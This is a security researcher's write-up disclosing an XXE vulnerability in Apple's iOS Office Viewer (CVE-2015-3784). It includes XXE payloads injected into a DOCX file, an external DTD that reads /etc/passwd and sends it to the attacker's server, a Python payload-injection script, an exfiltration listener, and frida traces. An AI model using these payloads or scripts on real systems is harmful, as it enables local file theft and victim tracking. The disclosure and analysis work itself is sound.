XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer)

This article summarises the discovery and analysis of the XXE vulnerability in the Apple iOS Office Viewer (CVE-2015-3784), and assumes the reader already has a basic understanding of XXE attacks. For analysis purposes, the tests were performed on a jailbroken iOS device, and the results were later confirmed on a stock ("jailed") iOS. We use Safari as the example application, but any iOS application that uses the internal Office Viewer (from the QuickLook framework) should behave similarly.


XML eXternal Entities vulnerabilities are a dime a dozen. Our experience tells us that they're quite prevalent in applications, especially when handling files whose format is XML. Such is the case with Microsoft Office OOXML files, and with similar file formats such as older Apple Keynote .key files or OpenOffice documents, which are basically ZIP archives of multiple XML files. This article focuses specifically on the DOCX file format, but PPTX and XLSX are essentially the same, and the technique is similar for the other formats.

Unzipping a DOCX file produces the following structure, which we will modify to include our XXE attack:

$ unzip xxe.docx
Archive:  xxe.docx
inflating: [Content_Types].xml
inflating: _rels/.rels
inflating: word/_rels/document.xml.rels
inflating: word/document.xml
inflating: word/theme/theme1.xml
extracting: docProps/thumbnail.jpeg
inflating: word/settings.xml
inflating: word/webSettings.xml
inflating: word/stylesWithEffects.xml
inflating: docProps/core.xml
inflating: word/styles.xml
inflating: word/fontTable.xml
inflating: docProps/app.xml

As the listing shows, there are plenty of XML files to play with. A good bet is [Content_Types].xml, which works well for the XXE when the following is inserted after its first line (the XML declaration):

<!DOCTYPE go [
<!ENTITY % go2 SYSTEM "">
%go2;
]>

You just need to update the DOCX file, and it's done:

$ zip -u xxe.docx \[Content_Types\].xml
updating: [Content_Types].xml (deflated 71%)
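The two manual steps above (editing [Content_Types].xml and re-zipping) can also be scripted. The following is a minimal Python sketch, not the author's tooling. `inject_doctype`, `add_doctype` and `DOCTYPE` are hypothetical names. The article's payload URL is not shown, so 192.0.2.10 (a documentation-only TEST-NET address) stands in as a placeholder for your own listener. The DOCTYPE is placed right after the XML declaration, which is the "first line" mentioned above.

```python
import zipfile

CONTENT_TYPES = "[Content_Types].xml"

# Hypothetical listener URL (192.0.2.10 is a documentation-only address);
# replace it with your own test server.
DOCTYPE = (
    "<!DOCTYPE go [\n"
    '<!ENTITY % go2 SYSTEM "http://192.0.2.10:8000/XXE">\n'
    "%go2;\n"
    "]>"
)


def add_doctype(xml_text: str, doctype: str) -> str:
    """Insert `doctype` right after the XML declaration (the file's first line)."""
    end = xml_text.index("?>") + 2 if xml_text.startswith("<?xml") else 0
    rest = xml_text[end:].lstrip("\r\n")
    return xml_text[:end] + "\n" + doctype + "\n" + rest


def inject_doctype(src, dst, doctype: str = DOCTYPE) -> None:
    """Copy the OOXML archive `src` to `dst`, patching only [Content_Types].xml.

    Unlike `zip -u`, zipfile cannot update a member in place, so every entry
    is copied into a fresh archive.
    """
    with zipfile.ZipFile(src) as zin, zipfile.ZipFile(dst, "w") as zout:
        for info in zin.infolist():
            data = zin.read(info)
            if info.filename == CONTENT_TYPES:
                # utf-8-sig drops a leading BOM, if any, before the startswith check
                text = add_doctype(data.decode("utf-8-sig"), doctype)
                data = text.encode("utf-8")
            # Reusing the source ZipInfo keeps each entry's name, timestamp
            # and compression method.
            zout.writestr(info, data)
```

For example, `inject_doctype("xxe.docx", "xxe-patched.docx")` writes a patched copy and leaves the original archive untouched.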

If the application or library parsing the document is vulnerable to XXE, it will connect over HTTP to our web server on port 8000 and request the file "XXE".

Testing this on a vulnerable iOS by using Safari to load the xxe.docx file, we get confirmation that it works:

- - [14/Aug/2015 17:58:35] "GET /xxe.docx HTTP/1.1" 200 -
- - [14/Aug/2015 17:58:35] "GET /XXE HTTP/1.0" 200 -

On the first line we see Safari fetching xxe.docx. It then parses the file and makes our XXE request.

This is fun, but can we do anything else?

Actually, by manipulating parameter entities, it is possible in some cases to read files remotely, out of band. You can read the details here: https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf

The SYSTEM identifier in XML exists precisely to load external resources such as other DTDs, which can define new entities. So we update our [Content_Types].xml file and create a dedicated external DTD that reads a file and sends its contents back to us:


<!DOCTYPE go [
<!ENTITY % go2 SYSTEM "">
%go2;
%all;
%send;
]>

The above loads a DTD from our server and then expands the %all and %send parameter entities, both of which come from the send.dtd file:

<!ENTITY % file SYSTEM "file://etc/passwd">
<!ENTITY % all "<!ENTITY &#37; send SYSTEM ';'>">

This DTD attempts to read /etc/passwd, placing its contents in the "file" entity. It then declares a new entity (read the PDF mentioned above if you haven't yet) that makes a request to our web server with those contents as a parameter of the request.
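Any static web server can receive these requests. The log lines in this article look like the default output of Python's http.server module (SimpleHTTPServer in Python 2), so here is a minimal sketch of a listener built on it. It assumes the exfiltrated data arrives in the query string, as in the DTD above. `CollectorHandler`, `extract_payload` and `serve` are hypothetical names.

```python
from http.server import HTTPServer, SimpleHTTPRequestHandler
from urllib.parse import unquote, urlsplit


def extract_payload(request_path: str) -> str:
    """Return the URL-decoded query string of a request path ('' if absent)."""
    return unquote(urlsplit(request_path).query)


class CollectorHandler(SimpleHTTPRequestHandler):
    """Serves files from the working directory (xxe.docx, send.dtd, ...) and
    prints anything that arrives in a request's query string."""

    def do_GET(self):
        payload = extract_payload(self.path)
        if payload:
            print("exfiltrated:", payload, flush=True)
        super().do_GET()


def serve(port: int = 8000) -> None:
    """Listen on all interfaces until interrupted with Ctrl+C."""
    HTTPServer(("", port), CollectorHandler).serve_forever()
```

Calling `serve()` from the directory holding xxe.docx and send.dtd serves both files and prints any data appended after `?`, while the default request log still shows every hit.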

Again, trying this on a vulnerable iOS... it partially fails:

- - [14/Aug/2015 17:58:07] "GET /xxe.docx HTTP/1.1" 200 -
- - [14/Aug/2015 17:58:08] "GET /send.dtd HTTP/1.0" 200 -

So Safari did read the DOCX and fetched the send.dtd file, but no contents came back. This could be for a number of reasons, such as permissions or sandboxing.

An interesting feature of some XML parsers is that they can read filesystem directories. Now it's time to read www.vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf

So we change the "file" entity to "file:///", which in some cases, depending on the library used, can actually list the root directory. We seem to be closer to success:

- - [14/Aug/2015 17:54:36] "GET /xxe.docx HTTP/1.1" 200 -
- - [14/Aug/2015 17:54:36] "GET /evil.dtd HTTP/1.0" 200 -
- - [14/Aug/2015 17:54:36] "GET /? HTTP/1.0" 301 -

So, the final "send" entity works, but no contents are sent.

This is now getting frustrating. Interestingly, looking at the syslog on the iOS device, we see that an error occurs when we try to read existing files:

Aug 14 18:57:47 iPhone MobileSafari[544]: EXCEPTION SFUDataRepresentationError: xmlParseChunk() failed: 1

Challenge accepted!

At this point, while we were thinking about how to actually debug Safari to find out where things were failing, Marco Vaz suggested using frida. I had never actually used frida, only read about it in the awesome Mobile Application Hacker's Handbook, and didn't know how it could be used for this purpose. So we started by tracing all xmlParse* calls with frida:

$ frida-trace -U safari -i "xmlParse*"
Instrumenting functions...
xmlParseChunk: Auto-generated handler at "__handlers__/libxml2.2.dylib/xmlParseChunk.js"
xmlParseURI: Auto-generated handler at "__handlers__/libxml2.2.dylib/xmlParseURI.js"
Started tracing 89 functions. Press Ctrl+C to stop.

When loading xxe.docx again, we get the following output:

           /* TID 0xaa2f */
 53809 ms  xmlParserInputBufferPush()
 53812 ms  xmlParseChunk()
 53813 ms     | xmlParseXMLDecl()
 53814 ms     |    | xmlParseVersionInfo()
 53814 ms     |    |    | xmlParseVersionNum()
 53822 ms     |    | xmlParseEncodingDecl()
 53823 ms     |    |    | xmlParseEncName()
 53824 ms     |    | xmlParseSDDecl()
 53826 ms     | xmlParseURI()
 53827 ms     | xmlParserInputGrow()
 53829 ms  xmlParserInputBufferPush()

From the output, we see an interesting function, xmlParseURI(), which makes sense since what we are trying to do is read a file identified by a URI. We also learn that it uses libxml2 to handle XML (the handlers were generated under libxml2.2.dylib). More on this later.

Frida lets us hook functions both when they are entered and when they return. One very simple change that helps a lot in understanding what's going on is to print the function's arguments. So we edit __handlers__/libxml2.2.dylib/xmlParseURI.js and change the logging to print the argument:

  onEnter(log, args, state) {
        // args[0] is xmlParseURI()'s only parameter, the URI string (const char *)
        log("xmlParseURI(" + Memory.readUtf8String(args[0]) + ")");
  },

Now, attempting to read the /etc/passwd file, we see the following output:

$ frida-trace  -U safari -i xmlParseChunk -i xmlParseURI
Instrumenting functions...                                              
xmlParseChunk: Loaded handler at "__handlers__/libxml2.2.dylib/xmlParseChunk.js"
Started tracing 2 functions. Press Ctrl+C to stop.                   

 24347 ms     | xmlParseURI(file://etc/passwd)
 24348 ms     | xmlParseURI(file://etc/passwd)
 24349 ms     | xmlParseURI(file://etc/passwd)
 24351 ms     | xmlParseURI(
# 4.3BSD-compatable User Database
# Note that this file is not consulted for login.
# It only exisits for compatability with 4.3BSD utilities.
# This file is automatically re-written by various system utilities.
# Do not edit this file.  Changes will be lost.
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
mobile:*:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false
_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
 24352 ms     | xmlParseURI(http://schemas.openxmlformats.org/package/2006/metadata/core-properties)
 24353 ms     | xmlParseURI(http://purl.org/dc/elements/1.1/)
 24353 ms     | xmlParseURI(http://purl.org/dc/terms/)
 24354 ms     | xmlParseURI(http://purl.org/dc/dcmitype/)

This is interesting. It seems that it actually reads the file, but fails to send it to us as a URL parameter.
If you read the vsecurity PDF mentioned above, and paid more attention than I did, you'll see that libxml2 is quite picky about URL characters. Specifically, on page 25 they state that "The libxml2 nano clients are so restrictive on URL content that they can prevent valid URLs from being requested, let alone those with questionable content. For this reason, out-of-band attacks using parameter entities will typically fail."
One of those characters is the newline (0x0a)... Worse, after some testing we found that at least the characters #, %, <, >, " and \ are also rejected, which makes exploiting this in any useful way quite a challenge, if it is possible at all.

So finding a relevant file whose contents satisfy all of those restrictions is no easy task.
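To get a feel for how restrictive this is, the check can be sketched in Python. This rough sketch assumes the rejected set is exactly the characters listed above. The article says "at least", so the real set is probably larger. `REJECTED`, `rejected_chars`, `can_exfiltrate` and `candidate_files` are hypothetical names, and the 4096-byte cap is arbitrary.

```python
import os

# Characters the article reports libxml2 refusing in the exfiltration URL.
# The authors say "at least" these, so the real set may well be larger.
REJECTED = set('\n#%<>"\\')


def rejected_chars(content: str) -> set:
    """Return the characters of `content` that, per the article's testing,
    would stop the out-of-band request from being made."""
    return set(content) & REJECTED


def can_exfiltrate(content: str) -> bool:
    return not rejected_chars(content)


def candidate_files(root: str, max_size: int = 4096):
    """Yield paths under `root` whose UTF-8 text avoids every REJECTED character.

    max_size is an arbitrary cap, chosen only to keep the scan quick.
    """
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in sorted(filenames):
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) > max_size:
                    continue
                # newline="" keeps '\r' and '\n' exactly as stored on disk
                with open(path, encoding="utf-8", newline="") as f:
                    text = f.read()
            except (OSError, UnicodeDecodeError):
                continue  # unreadable (permissions, sandbox) or not text
            if text and can_exfiltrate(text):
                yield path
```

For instance, `rejected_chars` flags both the `#` comment lines and the newlines of the /etc/passwd shown above, so that file could never be sent this way.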

Moreover, even if such a file existed, on a stock iOS the process is sandboxed and can only read the files the sandbox allows, further reducing the set of files that could be compromised.

So what about OSX?

OSX has the same problem, which is why Apple also shipped this fix for QuickLook (which they call "QL Office") in 10.10.5. The catch on OSX is that QuickLook is, apparently, correctly sandboxed, so any network connection fails:

Aug 16 13:15:03 xxx.local sandboxd[284] ([53893]): QuickLookSatelli(53893) deny network-outbound

As far as I can tell, this was not exploitable in OSX.


Interestingly, Apple had already fixed a similar issue in iOS 8 and OSX 10.10 (CVE-2014-4374) in NSXMLParser, part of the Foundation framework, as detailed in vsecurity's advisory at http://www.vsecurity.com/download/advisories/20140917-1.txt, but failed to fix it for libxml2 or the applications using it. Also interesting: they took 4 months to fix that one, as they did this time, so at least they're consistent about their XXE fixing timelines :).

Although it was quite interesting to find that XXE was possible in Apple's own applications on iOS (and OSX), Apple seems to have had some luck. libxml2's strict restrictions on URL contents made this bug little more than a proof of concept, although leaking the victim's IP address may be a relevant privacy issue in some scenarios (e.g. send a file to a victim, wait for them to open it, get their IP address, profit!). Sandboxing also helped reduce the impact of this bug on both platforms.

This vulnerability also gave me the opportunity to use frida, a very interesting tool. I didn't find it very stable, and frida-server crashed quite often, but it's a very powerful tool nonetheless.

Written by Bruno Morisson